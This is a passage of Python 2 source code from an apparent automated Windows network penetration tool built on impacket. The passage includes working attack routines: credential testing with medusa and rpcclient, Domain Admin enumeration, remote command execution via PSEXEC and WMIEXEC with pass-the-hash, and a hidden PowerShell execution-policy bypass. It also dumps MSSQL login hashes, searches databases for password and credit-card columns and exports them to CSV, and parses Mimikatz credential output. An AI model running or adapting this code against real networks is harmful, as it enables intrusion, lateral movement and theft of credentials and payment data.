'localpcname'\ntotalAns=\"\"\nvulnStatus=False\nappPath='/pentest/impacket/examples/'\nbold=True\norigScriptPath=os.getcwd()\n\ndomainAdminList=[]\n#domainUserList=[]\n\nlocalUserList=[]\nattemptedCredList=[]\n\noutputBuffer1 = ''\ntmpRegResultList1 = []\ntmpRegResultList2 = []\ntmpRegResultList3 = []\nhashList=[]\npassList=[]\nuserPassList=[]\nuserHashList=[]\ndaPassList=[]\n\nverbose=False\nnetbiosName=\"\"\nliveList=[]\nipList=[]\nfolderDepth=4\n\ndcCompromised=False\n\nrdpList=[]\nnbList=[]\ndcList=[]\nmssqlList=[]\n\naccessOKHostList=[]\naccessAdmHostList=[]\nuncompromisedHostList=[]\n\npowershellCmdStart='powershell -Sta -executionpolicy bypass -noninteractive -nologo -window hidden '\nclass ThreadingSimpleServer(ThreadingMixIn, HTTPServer):\n    pass\n\nclass ForkingSimpleServer(ForkingMixIn, HTTPServer):\n    pass\nclass colors:\n    def __init__(self):\n        self.green = \"\\033[92m\"\n        self.blue = \"\\033[94m\"\n        self.bold = \"\\033[1m\"\n        self.yellow = \"\\033[93m\"\n        self.red = \"\\033[91m\"\n        self.end = \"\\033[0m\"\ncolor = colors()\n\nclass RemoteOperationsReg:\n\n    def __init__(\n        self,\n        smbConnection,\n        doKerberos,\n        kdcHost=None,\n        ):\n        self.__smbConnection = smbConnection\n        self.__smbConnection.setTimeout(5 * 60)\n        self.__serviceName = 'RemoteRegistry'\n        self.__stringBindingWinReg = r'ncacn_np:445[\\pipe\\winreg]'\n        self.__rrp = None\n        self.__regHandle = None\n\n        self.__doKerberos = doKerberos\n        self.__kdcHost = kdcHost\n\n        self.__disabled = False\n        self.__shouldStop = False\n        self.__started = False\n\n        self.__stringBindingSvcCtl = r'ncacn_np:445[\\pipe\\svcctl]'\n        self.__scmr = None\n\n    def getRRP(self):\n        return self.__rrp\n\n    def __connectSvcCtl(self):\n        rpc = \\\n            transport.DCERPCTransportFactory(self.__stringBindingSvcCtl)\n        rpc.set_smb_connection(self.__smbConnection)\n        self.__scmr = rpc.get_dce_rpc()\n        self.__scmr.connect()\n        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)\n\n    def connectWinReg(self):\n        rpc = \\\n            transport.DCERPCTransportFactory(self.__stringBindingWinReg)\n        rpc.set_smb_connection(self.__smbConnection)\n        self.__rrp = rpc.get_dce_rpc()\n        self.__rrp.connect()\n        self.__rrp.bind(rrp.MSRPC_UUID_RRP)\n\n    def __checkServiceStatus(self):\n\n        # Open SC Manager\n\n        ans = scmr.hROpenSCManagerW(self.__scmr)\n        self.__scManagerHandle = ans['lpScHandle']\n\n        # Now let's open the service\n\n        ans = scmr.hROpenServiceW(self.__scmr, self.__scManagerHandle,\n                                  self.__serviceName)\n        self.__serviceHandle = ans['lpServiceHandle']\n\n        # Let's check its status\n\n        ans = scmr.hRQueryServiceStatus(self.__scmr,\n                self.__serviceHandle)\n        if ans['lpServiceStatus']['dwCurrentState'] \\\n            == scmr.SERVICE_STOPPED:\n            logging.info('Service %s is in stopped state'\n                         % self.__serviceName)\n            self.__shouldStop = True\n            self.__started = False\n        elif ans['lpServiceStatus']['dwCurrentState'] \\\n            == scmr.SERVICE_RUNNING:\n            logging.debug('Service %s is already running'\n                          % self.__serviceName)\n            self.__shouldStop = False\n            self.__started = True\n        else:\n            raise Exception('Unknown service state 0x%x - Aborting'\n                            % ans['CurrentState'])\n\n        # Let's check its configuration if service is stopped, maybe it's disabled :s\n\n        if self.__started is False:\n            ans = scmr.hRQueryServiceConfigW(self.__scmr,\n                    self.__serviceHandle)\n            if ans['lpServiceConfig']['dwStartType'] == 0x4:\n                logging.info('Service %s is disabled, enabling it'\n                             % self.__serviceName)\n                self.__disabled = True\n                scmr.hRChangeServiceConfigW(self.__scmr,\n                        self.__serviceHandle, dwStartType=0x3)\n            logging.info('Starting service %s' % self.__serviceName)\n            scmr.hRStartServiceW(self.__scmr, self.__serviceHandle)\n            time.sleep(1)\n\n    def enableRegistry(self):\n        self.__connectSvcCtl()\n        self.__checkServiceStatus()\n        self.connectWinReg()\n\n    def __restore(self):\n\n        # First of all stop the service if it was originally stopped\n\n        if self.__shouldStop is True:\n            logging.info('Stopping service %s' % self.__serviceName)\n            scmr.hRControlService(self.__scmr, self.__serviceHandle,\n                                  scmr.SERVICE_CONTROL_STOP)\n        if self.__disabled is True:\n            logging.info('Restoring the disabled state for service %s'\n                         % self.__serviceName)\n            scmr.hRChangeServiceConfigW(self.__scmr,\n                    self.__serviceHandle, dwStartType=0x4)\n\n    def finish(self):\n        self.__restore()\n        if self.__rrp is not None:\n            self.__rrp.disconnect()\n        if self.__scmr is not None:\n            self.__scmr.disconnect()\n\n\nclass RegHandler:\n\n    def __init__(\n        self,\n        targetIP,\n        domain,\n        username,\n        password,\n        passwordHash,\n        keyName,\n        selectedKey,\n        ):\n        self.__username = username\n        self.__password = password\n        self.__domain = domain\n        self.__action = 'QUERY'\n        self.__lmhash = ''\n        self.__nthash = ''\n        self.__aesKey = None\n        self.__doKerberos = None\n        self.__kdcHost = None\n        self.__smbConnection = None\n        self.__remoteOps = None\n        self.__port = 445\n        self.__keyName = keyName\n        self.__selectedKey = selectedKey\n\n        # It's possible that this is defined somewhere, but I couldn't find where\n\n        self.__regValues = {\n            0: 'REG_NONE',\n            1: 'REG_SZ',\n            2: 'REG_EXPAND_SZ',\n            0x3: 'REG_BINARY',\n            0x4: 'REG_DWORD',\n            5: 'REG_DWORD_BIG_ENDIAN',\n            6: 'REG_LINK',\n            7: 'REG_MULTI_SZ',\n            11: 'REG_QWORD',\n            }\n\n        if passwordHash is not None:\n            (self.__lmhash, self.__nthash) = passwordHash.split(':')\n\n    def connect(self, remoteName, remoteHost):\n        self.__smbConnection = SMBConnection2(remoteName, remoteHost,\n                sess_port=int(self.__port))\n\n        if self.__doKerberos:\n            self.__smbConnection.kerberosLogin(\n                self.__username,\n                self.__password,\n                self.__domain,\n                self.__lmhash,\n                self.__nthash,\n                self.__aesKey,\n                self.__kdcHost,\n                )\n        else:\n            try:\n                self.__smbConnection.login(self.__username,\n                        self.__password, self.__domain, self.__lmhash,\n                        self.__nthash)\n            except Exception, e:\n                if 'bad username or authentication information' \\\n                    in str(e):\n                    if len(self.__lmhash) < 1 and len(self.__nthash) \\\n                        < 1:\n                        if [targetIP, 'Access Denied', self.__username\n                            + '|' + self.__password, None] \\\n                            not in tmpRegResultList3:\n                            tmpRegResultList3.append([targetIP,\n                                    'Access Denied', self.__username\n                                    + '|' + self.__password, None])\n                    else:\n                        tmpRegResultList3.append([targetIP,\n                                'Access Denied', 'Invalid credentials: '\n                                 + self.__username + '|'\n                                + self.__lmhash + ':' + self.__nthash,\n                                None])\n                pass\n\n    def run(self, remoteName, remoteHost):\n        self.connect(remoteName, remoteHost)\n        self.__remoteOps = RemoteOperationsReg(self.__smbConnection,\n                self.__doKerberos, self.__kdcHost)\n\n        try:\n            self.__remoteOps.enableRegistry()\n        except Exception, e:\n\n            # logging.debug(str(e))\n            # logging.warning('Cannot check RemoteRegistry status. Hoping it is started...')\n\n            self.__remoteOps.connectWinReg()\n\n        try:\n            dce = self.__remoteOps.getRRP()\n\n            if self.__action == 'QUERY':\n                results = self.query(dce, self.__keyName,\n                        self.__selectedKey)\n                return (results, True)\n            else:\n                logging.error('Method %s not implemented yet!'\n                              % self.__action)\n        except (Exception, KeyboardInterrupt), e:\n\n            # import traceback\n            # traceback.print_exc()\n            # here\n\n            results = str(e)\n            return (results, False)\n        finally:\n\n            # logging.critical(str(e))\n\n            if self.__remoteOps:\n                self.__remoteOps.finish()\n\n    def query(\n        self,\n        dce,\n        keyName,\n        selectedKey,\n        ):\n\n        # Let's strip the root key\n\n        try:\n            rootKey = keyName.split('\\\\')[0]\n            subKey = '\\\\'.join(keyName.split('\\\\')[1:])\n        except Exception:\n            raise Exception('Error parsing keyName %s' % keyName)\n\n        if rootKey.upper() == 'HKLM':\n            ans = rrp.hOpenLocalMachine(dce)\n        elif rootKey.upper() == 'HKU' or rootKey.upper() == 'HKCU':\n            ans = rrp.hOpenCurrentUser(dce)\n        elif rootKey.upper() == 'HKCR':\n            ans = rrp.hOpenClassesRoot(dce)\n        else:\n            raise Exception('Invalid root key %s ' % rootKey)\n\n        hRootKey = ans['phKey']\n        ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,\n                                   samDesired=rrp.MAXIMUM_ALLOWED\n                                   | rrp.KEY_ENUMERATE_SUB_KEYS\n                                   | rrp.KEY_QUERY_VALUE)\n        if len(selectedKey) > 0:\n            value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'],\n                    str(selectedKey))\n            return str(value[1])\n        else:\n\n            # print '\\t' + self.__options.v + '\\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\\t', str(value[1])\n        # elif self.__options.ve:\n        #    print keyName\n        #    value = rrp.hBaseRegQueryValue(dce, ans2['phkResult'], '')\n        #    print '\\t' + '(Default)' + '\\t' + self.__regValues.get(value[0], 'KEY_NOT_FOUND') + '\\t', str(value[1])\n        # elif self.__selectedKey==None:\n\n            entriesList = self.__print_all_entries(dce, subKey + '\\\\',\n                    ans2['phkResult'], 0)\n            return entriesList\n\n            # self.__print_all_subkeys_and_entries(dce, subKey + '\\\\', ans2['phkResult'], 0)\n        # else:\n        #    print \"selectedKey\"\n        #    print selectedKey\n        #    self.__print_key_values(dce, ans2['phkResult'])\n        #    i = 0\n        #    while True:\n        #        try:\n        #            key = rrp.hBaseRegEnumKey(dce, ans2['phkResult'], i)\n        #            print selectedKey + '\\\\' + key['lpNameOut'][:-1]\n        #            i += 1\n        #        except Exception:\n        #            break\n\n    def __print_key_values(self, rpc, keyHandler):\n        i = 0\n        resultList = []\n        while True:\n            try:\n                ans4 = rrp.hBaseRegEnumValue(rpc, keyHandler, i)\n                lp_value_name = (ans4['lpValueNameOut'])[:-1]\n                if len(lp_value_name) == 0:\n                    lp_value_name = '(Default)'\n                lp_type = ans4['lpType']\n                lp_data = ''.join(ans4['lpData'])\n\n                # here1\n\n                print '\\t' + lp_value_name + '\\t' \\\n                    + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') \\\n                    + '\\t',\n\n                # print lp_value_name+\"\\t\"+self.__regValues.get(lp_type, 'KEY_NOT_FOUND')\n                # resultList.append('\\t' + lp_value_name + '\\t' + self.__regValues.get(lp_type, 'KEY_NOT_FOUND') + '\\t',)\n\n                self.__parse_lp_data(lp_type, lp_data)\n                i += 1\n            except rrp.DCERPCSessionError, e:\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n        return resultList\n\n    def __print_all_entries(\n        self,\n        rpc,\n        keyName,\n        keyHandler,\n        index,\n        ):\n        index = 0\n        resultList = []\n        while True:\n            try:\n                subkey = rrp.hBaseRegEnumKey(rpc, keyHandler, index)\n                index += 1\n                ans = rrp.hBaseRegOpenKey(rpc, keyHandler,\n                        subkey['lpNameOut'],\n                        samDesired=rrp.MAXIMUM_ALLOWED\n                        | rrp.KEY_ENUMERATE_SUB_KEYS)\n                newKeyName = keyName + (subkey['lpNameOut'])[:-1] + '\\\\'\n\n                # print newKeyName\n\n                resultList.append((subkey['lpNameOut'])[:-1])\n            except rrp.DCERPCSessionError, e:\n\n                # self.__print_key_values(rpc, ans['phkResult'])\n                # self.__print_all_subkeys_and_entries(rpc, newKeyName, ans['phkResult'], 0)\n\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n            except rpcrt.DCERPCException, e:\n                if str(e).find('access_denied') >= 0:\n                    logging.error('Cannot access subkey %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    continue\n                elif str(e).find('rpc_x_bad_stub_data') >= 0:\n                    logging.error('Fault call, cannot retrieve value for %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    return\n                raise\n        return resultList\n\n    def __print_all_subkeys_and_entries(\n        self,\n        rpc,\n        keyName,\n        keyHandler,\n        index,\n        ):\n        index = 0\n        while True:\n            try:\n                subkey = rrp.hBaseRegEnumKey(rpc, keyHandler, index)\n                index += 1\n                ans = rrp.hBaseRegOpenKey(rpc, keyHandler,\n                        subkey['lpNameOut'],\n                        samDesired=rrp.MAXIMUM_ALLOWED\n                        | rrp.KEY_ENUMERATE_SUB_KEYS)\n                newKeyName = keyName + (subkey['lpNameOut'])[:-1] + '\\\\'\n\n                # print newKeyName\n\n                self.__print_key_values(rpc, ans['phkResult'])\n                self.__print_all_subkeys_and_entries(rpc, newKeyName,\n                        ans['phkResult'], 0)\n            except rrp.DCERPCSessionError, e:\n                if e.get_error_code() == ERROR_NO_MORE_ITEMS:\n                    break\n            except rpcrt.DCERPCException, e:\n                if str(e).find('access_denied') >= 0:\n                    logging.error('Cannot access subkey %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    continue\n                elif str(e).find('rpc_x_bad_stub_data') >= 0:\n                    logging.error('Fault call, cannot retrieve value for %s, bypassing it'\n                                   % (subkey['lpNameOut'])[:-1])\n                    return\n                raise\n\n    @staticmethod\n    def __parse_lp_data(valueType, valueData):\n        try:\n            if valueType == rrp.REG_SZ or valueType \\\n                == rrp.REG_EXPAND_SZ:\n                if type(valueData) is int:\n                    print 'NULL'\n                else:\n                    print '%s' % valueData.decode('utf-16le')[:-1]\n            elif valueType == rrp.REG_BINARY:\n                print ''\n                hexdump(valueData, '\\t')\n            elif valueType == rrp.REG_DWORD:\n                print '0x%x' % unpack('<L', valueData)[0]\n            elif valueType == rrp.REG_QWORD:\n                print '0x%x' % unpack('<Q', valueData)[0]\n            elif valueType == rrp.REG_NONE:\n                try:\n                    if len(valueData) > 1:\n                        print ''\n                        hexdump(valueData, '\\t')\n                    else:\n                        print ' NULL'\n                except:\n                    print ' NULL'\n            elif valueType == rrp.REG_MULTI_SZ:\n                print '%s' % valueData.decode('utf-16le')[:-2]\n            else:\n                print 'Unkown Type 0x%x!' % valueType\n                hexdump(valueData)\n        except Exception, e:\n            logging.debug('Exception thrown when printing reg value %s'\n                          , str(e))\n            print 'Invalid data'\n            pass\n\n#MSSQL Test\n\ndef getNetBiosName(ip):\n    n = NetBIOS(broadcast=True, listen_port=0)\n    netbiosName=''\n    try:\n        netbiosName=n.queryIPForName(ip)[0]\n    except Exception as e:\n        pass\n    return netbiosName\n\ndef listDatabases(db,conn):\n    sql_query='USE master; SELECT NAME FROM sysdatabases;'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    dbList=[]\n    defaultDBList=[]\n    defaultDBList.append('master')\n    defaultDBList.append('tempdb')\n    defaultDBList.append('model')\n    defaultDBList.append('msdb')\n    for x in results:\n        for k, v in x.iteritems():\n            if v not in defaultDBList:  \n                dbList.append(v)\n    return dbList\n\ndef listTables(db,conn,dbName):\n    sql_query='SELECT * FROM '+dbName+'.INFORMATION_SCHEMA.TABLES;'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    tableList=[]\n    for x in results:\n        if x.values()[3]=='BASE TABLE':\n            tableList.append([x.values()[0],x.values()[2]])\n    return tableList\n    #print tabulate(tableList)\n\ndef listColumns(db,conn,dbName,tableName):\n    sql_query='use '+dbName+';exec sp_columns '+tableName+';'\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    columnList=[]\n    for x in results:\n        columnName=x.values()[-1]\n        columnList.append([dbName,tableName,columnName])\n    return columnList\n    #print tabulate(results)\n\ndef sampleData(db,conn,dbName,tableName):\n    sql_query='use '+dbName+';select * from '+tableName+';'\n    #sql_query='use '+dbName+';select TOP(10) * from '+tableName+';'\n    try:\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        return results\n        #print tabulate(results)\n    except Exception as e:\n        print e\n    #print tabulate(results)\n\ndef dumpSQLHashes(db,conn,pre2008=True):\n    #sql_query='USE master; select @@version'\n    resultList=[]\n    if pre2008==False:\n        sql_query='SELECT name,password_hash FROM sys.sql_logins;'\n        print sql_query\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        for x in results:\n            print x.values()\n            resultList.append(x.values)\n    else:\n        sql_query='SELECT password from master.dbo.sysxlogins;'\n        print sql_query\n        results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n        for x in results:\n            print x.values()\n            resultList.append(x.values)\n    return resultList\n    \ndef getSQLVersion(db,conn):\n    sql_query='USE master; select @@version'\n    print sql_query\n    results= conn.RunSQLQuery(db,sql_query,tuplemode=False,wait=True)\n    return results[0].values()\n\ndef testMSSQL(host,port,user,password,password_hash=None,domain=None,domainCred=True):\n    searchList=[]\n    searchList.append('passw')\n    searchList.append('credit')\n    searchList.append('card')\n    fp = tds.MSSQL(host, int(port))\n    fp.connect() \n    foundList=[]\n    try:\n        r = fp.login(None, user, password, domain, password_hash, domainCred)\n        key = fp.replies[TDS_LOGINACK_TOKEN][0]\n        dbVer=getSQLVersion(db,fp)\n        print dbVer\n        if \"2008\" in dbVer or \"2012\" in dbVer:\n            print dumpSQLHashes(db,fp,True)\n        else:\n            print dumpSQLHashes(db,fp,False)        \n        #listDatabases(db,fp)\n        dbName='mmsdata1'   \n        tableList=listTables(db,fp,dbName)\n        for x in tableList:\n            tableName=x[1]\n            results = (listColumns(db,fp,dbName,tableName))\n            for y in results:\n                columnName = y[2]\n                for word in searchList:\n                    if word in columnName.lower():\n                        if [y[0],y[1]] not in foundList:\n                            foundList.append([y[0],y[1]])\n    except Exception as e:\n        print e\n    fp.disconnect()\n    \n    fp = tds.MSSQL(host, int(port))\n    fp.connect() \n    r = fp.login(None, user, password, domain, password_hash, domainCred)\n    key = fp.replies[TDS_LOGINACK_TOKEN][0]\n    for x in foundList:\n        dbName=str(x[0])\n        tableName=str(x[1])\n        columnList=[]\n        results=(listColumns(db,fp,dbName,tableName))\n        for y in results:\n            columnList.append(y[2])\n        results=sampleData(db,fp,dbName,tableName)\n        try:\n            if len(results)>0:\n                with open(dbName+\"_\"+tableName+\".csv\", \"wb+\") as f:\n                    writer = csv.writer(f)\n                    writer.writerow(columnList)\n                    for y in results:\n                        writer.writerow(y.values())\n        except Exception as e:\n            continue\n#MSSQL Test\n\ndef testAdminAccess(tmphostno, tmpdomain, tmpusername, tmppassword, tmppasswordHash):\n    '''\n    resultList=results.split(\"\\n\")\n    try:\n        conn = SMBConnection1(username,password,client_machine_name,hostNo,domain=domain,use_ntlm_v2=True,is_direct_tcp=True)\n        connected = conn.connect(hostNo, 445)    \n        shares = conn.listShares()        \n        shareName=\"C$\"  \n        sharedfiles = conn.listPath(shareName, '/')\n        if len(sharedfiles)>0:\n            return True\n        else:\n            return False\n    except Exception as e:\n        return False\n    '''\n    command=\"ipconfig.exe\"\n    results=runPSEXEC(tmphostno, tmpdomain, tmpusername, tmppassword, tmppasswordHash, command)        \n    if len(results)>0 and type(results)!=None:\n        return True\n    else:\n        return False\n\n\ndef testDomainCredentials(username,password,passwordHash,ip,domain):\n    foundAdmin=False\n    if [str(ip),str(domain).lower(),str(username),str(password)] in attemptedCredList:\n        print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" [FAILED]\"\n        return False,foundAdmin\n    else:\n        if password!=None:\n            attemptedCredList.append([str(ip),str(domain).lower(),str(username),str(password)])\n        else:\n            attemptedCredList.append([str(ip),str(domain).lower(),str(username),str(passwordHash)])\n        if passwordHash!=None:\n            password=None\n            if testAdminAccess(ip, domain, username, password, passwordHash)==True:\n                foundAdmin=True\n                if domain=='':\n                    domain=\"WORKGROUP\"\n                print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" [OK][ADMIN]\"\n                return True,foundAdmin\n            else:\n                if len(domain.strip())<1:\n                    domain=\"WORKGROUP\"\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+passwordHash+\" [FAILED]\"\n                return False,foundAdmin\n        else:\n            try:\n                command=\"medusa -M smbnt -u \"+domain+\"\\\\\\\\\"+username+\" -p '\"+password+\"' -h \"+ip\n                resultList = runCommand(command, shell = True, timeout = 30)\n                if \"SUCCESS\" in str(resultList):\n                    if testAdminAccess(ip, domain, username, password, passwordHash)==True:\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK][ADMIN]\"\n                        foundAdmin=True\n                        tmpfound=False\n                        for x in accessAdmHostList:\n                            tmpip=x[0]\n                            if tmpip==ip:\n                                tmpfound=True\n                        if tmpfound==False:\n                            if len(domain)<1:\n                                domain=\"WORKGROUP\"\n                            if [ip, domain, username, password] not in accessAdmHostList:\n\n                                accessAdmHostList.append([ip, domain, username, password])\n                                '''\n                                tmphash=None\n                                tmpPasswordList=runMimikatz(ip,domain,username,password,tmphash)\n                                for z in tmpPasswordList:\n                                    if z not in userPassList:\n                                        userPassList.append(z)                        \n                                print (setColor(\"\\n[+]\", bold, color=\"green\"))+\" Dumping Hashes from Host: \"+ip\n                                tmpHashList=dumpDCHashes(ip,domain,username,password)\n                                if len(tmpHashList)>0:\n                                    addHashes(tmpHashList)\n                                    if ip in uncompromisedHostList:\n                                        uncompromisedHostList.remove(ip)\n                                    analyzeHashes(tmpHashList)\n                                    if ip in uncompromisedHostList:\n                                        uncompromisedHostList.remove(ip)\n                                '''\n                    else:\n                        print (setColor(\"[+]\", bold, color=\"green\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" [OK]\"\n                        if [ip, domain, username, password] not in accessOKHostList:\n                            accessOKHostList.append([ip, domain, username, password])\n                    return True,foundAdmin   \n                else:\n                    print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" [FAILED]\"\n                    return False,foundAdmin\n            except Exception as e:\n                print (setColor(\"[-]\", bold, color=\"red\"))+\" \"+ip+\":445 \"+getNetBiosName(ip)+\" | \"+domain+\"\\\\\"+username+\":\"+password+\" [FAILED]\"\n                return False,foundAdmin\n\ndef testDomainCredentials1(username,password,hostNo):\n    ansi_escape = re.compile(r'\\x1b[^m]*m')\n    password = ansi_escape.sub('', password)\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\"  -c 'enumdomgroups'\"\n    resultList = runCommand(cmd, shell = True, timeout = 30)\n    if \"group:\" in str(resultList):\n        return True\n    else:\n        return False\n\ndef getDomainAdminUsers(username,password,hostNo):\n    results=False\n    userList1=[]\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'enumdomusers'\"\n    resultList = runCommand(cmd, shell = True, timeout = 15)\n    list1 = resultList[1].split(\"\\n\")\n    for x in list1:\n        try:        \n            domainUser = (x.split(\"] rid:[\")[0]).replace(\"user:[\",\"\")\n            userRID = (x.split(\"] rid:[\")[1])[0:len(x.split(\"] rid:[\")[1])-1]\n            userList1.append([domainUser,userRID])\n        except IndexError:\n            continue\n\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'enumdomgroups' | grep -i 'Domain Admin' | awk -F'rid:' '{print $2}' | sed 's:^.\\(.*\\).$:\\\\1:'\"\n    resultList = runCommand(cmd, shell = True, timeout = 15)\n    groupID = (resultList[1]).strip()\n    cmd = \"rpcclient -U \"+username+\"%'\"+password+\"' \"+hostNo+\" -c 'querygroupmem \"+groupID+\"' | awk -F']' '{print $1}' | awk -F'[' '{print $2}'\"\n    unFoundList=[]\n    resultList = runCommand(cmd, shell = True, timeout = 15)    \n    list1 = resultList[1].split(\"\\n\")\n    for x in list1:\n        found=False\n        for y in userList1:\n            if x==y[1]:\n                found=True\n                domainAdminList.append(y[0].lower())\n        if found==False and len(x)>0:\n            unFoundList.append(x)\n    for x in unFoundList:\n        cmd = \"/opt/local/bin/rpcclient -U \"+username+\"%\"+password+\" \"+ip+\" -c 'querygroupmem \"+x+\"' | awk -F']' '{print $1}' | awk -F'[' '{print $2}'\"\n        resultList = runCommand(cmd, shell = True, timeout = 15)\n        list1 = resultList[1].split(\"\\n\")\n        for x in list1:\n            for y in userList1:\n                if x==y[1]:\n                    if y[0].lower() not in domainAdminList:\n                        domainAdminList.append(y[0].lower())\n    if len(domainAdminList)>0:\n        print (setColor(\"\\nEnumerating Users in Domain\", bold, color=\"green\"))\n        for x in domainAdminList:\n            print x\n        print \"\\n\"\n        if len(domainAdminList)>0:\n            if username.lower() in domainAdminList:\n                print \"[+] Is '\"+username+\"' in the Domain Admin group?: \"+(setColor(\"Yes\", bold, color=\"red\"))\n                results=True\n            else:\n                print \"[+] Is '\"+username+\"' in the Domain Admin group?: \"+(setColor(\"No\", bold, color=\"red\"))\n    #for x in userList1:\n    #    print x[0]\n    return results\n\ndef runPSEXEC(targetIP,domain,username,password,passwordHash,command):\n    resultsOutput=''\n    try:\n        executer = PSEXEC(command,None,None,None,int(445),username,password,domain,passwordHash,None,False,None)       \n        executer.run(targetIP,targetIP)\n        resultsOutput=executer.getOutput()\n        executer.clearOutput()\n        return resultsOutput\n    except Exception as e:\n        pass\n        #print e\n\ndef runWMIEXEC(targetIP,domain,username,password,passwordHash,command):\n    resultsOutput=''\n    #hashes = passwordHash\n\n    #passwordHash=None\n    #hashes = None\n    aesKey = None\n    share = 'ADMIN$'\n    nooutput = False\n    k = False\n    dc_ip = None\n    executer = WMIEXEC(command,username,password,domain,passwordHash,aesKey,share,nooutput,k,dc_ip)\n    executer.run(targetIP)\n    resultsOutput=executer.getOutput()\n    return resultsOutput\ndef setDemo():\n    cmd ='date +%Y%m%d -s \"20120418\"'\n    runCommand1(cmd)\ndef checkCurrentTime():\n    currentTime=runCommand1(\"date\")\n    return currentTime\ndef checkRemoteTime(targetIP):\n    remoteTime=runCommand1(\"net time -S \"+targetIP)\n    return remoteTime\ndef get_process_children(pid):\n    p = Popen('ps --no-headers -o pid --ppid %d' % pid, shell = True,\n              stdout = PIPE, stderr = PIPE)\n    stdout, stderr = p.communicate()\n    return [int(p) for p in stdout.split()]\ndef runCommand(args, cwd = None, shell = False, kill_tree = True, timeout = -1, env = None):\n    class Alarm(Exception):\n        pass\n    def alarm_handler(signum, frame):\n        raise Alarm\n    p = Popen(args, shell = shell, cwd = cwd, stdout = PIPE, stderr = PIPE, env = env)\n    if timeout != -1:\n        signal(SIGALRM, alarm_handler)\n        alarm(timeout)\n    try:\n        stdout, stderr = p.communicate()\n        if timeout != -1:\n            alarm(0)\n    except Alarm:\n        pids = [p.pid]\n        if kill_tree:\n            pids.extend(get_process_children(p.pid))\n        for pid in pids:\n            # process might have died before getting to this line\n            # so wrap to avoid OSError: no such process\n            try: \n                kill(pid, SIGKILL)\n            except OSError:\n                pass\n        return -9, '', ''\n    return p.returncode, stdout, stderr    \ndef runCommand1(fullCmd):\n    try:\n        return commands.getoutput(fullCmd)\n    except Exception as e:\n        print e\n        return \"Error executing command %s\" %(fullCmd)\ndef setColor(message, bold=False, color=None, onColor=None):\n    retVal = colored(message, color=color, on_color=onColor, attrs=(\"bold\",))\n    return retVal\n\ndef convertWinToLinux(filename):\n    tmpFilename=\"/tmp/\"+generateRandomStr()+\".txt\"\n    sourceEncoding = \"utf-16\"\n    targetEncoding = \"utf-8\"\n    source = open(filename)\n    target = open(tmpFilename, \"w\")\n    target.write(unicode(source.read(), sourceEncoding).encode(targetEncoding))    \n    return tmpFilename\n\n\ndef parseMimikatzOutput(list1):\n    tmpPasswordList=[]\n    username1=\"\"\n    domain1=\"\"\n    password1=\"\"\n    lmHash=\"\"\n    ntHash=\"\"\n    list2=list1.split(\"\\n\")\n    for x in list2:\n        if \"Username :\" in x or \"Domain   :\" in x or \"Password :\" in x or \"LM       :\" in x or \"NTLM     :\" in x:\n            if \"* Username :\" in x:\n                username1=(x.replace(\"* Username :\",\"\")).strip()\n            if \"* Domain   :\" in x:\n                domain1=(x.replace(\"* Domain   :\",\"\")).strip()\n            if \"* LM       :\" in x:\n                lmHash=(x.replace(\"* LM       :\",\"\")).strip()\n            if \"* NTLM     :\" in x:\n                ntHash=(x.replace(\"* NTLM     :\",\"\")).strip()\n                if len(lmHash)<1:\n                    lmHash='aad3b435b51404eeaad3b435b51404ee'\n                password1=lmHash+\":\"+ntHash\n            if \"* Password :\" in x:\n                password1=x.replace(\"* Password :\",\"\")\n            domain1=domain1.strip()\n            username1=username1.strip()\n            password1=password1.strip()\n            if len(username1)>1 and len(domain1)>1 and len(password1)>1: \n                #if (domain1!=\"(null)\" or username1!=\"(null)\" or password1!=\"(null)\"):\n                if domain1!=\"(null)\":                    \n                    if not username1.endswith(\"$\") and len(password1)<50:\n                        if \"\\\\\" in username1:\n                            domain1=username1.split(\"\\\\\")[0]   \n                            username1=username1.split(\"\\\\\")[1]   \n                        if len(password1)>0 and password1!='(null)':\n                            if [domain1,username1,password1] not in tmpPasswordList:\n                                tmpPasswordList.append([str(domain1),str(username1),str(password1)])\n                username1=\"\"\n                domain1=\"\"\n                password1=\"\"\n                lmHash=\"\"\n                ntHash=\"\"\n    if len(tmpPasswordList)>0:\n        print (setColor(\"[+]\", bold, color=\"green\"))+\" Found the below credentials via Mimikatz\"\n        headers = [\"Domain\",\"Username\",\"Password\"]\n        print tabulate(tmpPasswordList,headers,tablefmt=\"simple\")\n    return tmpPasswordList\n\ndef analyzeHashes(hashList):\n    print (setColor(\"\\n[+]\", bold, 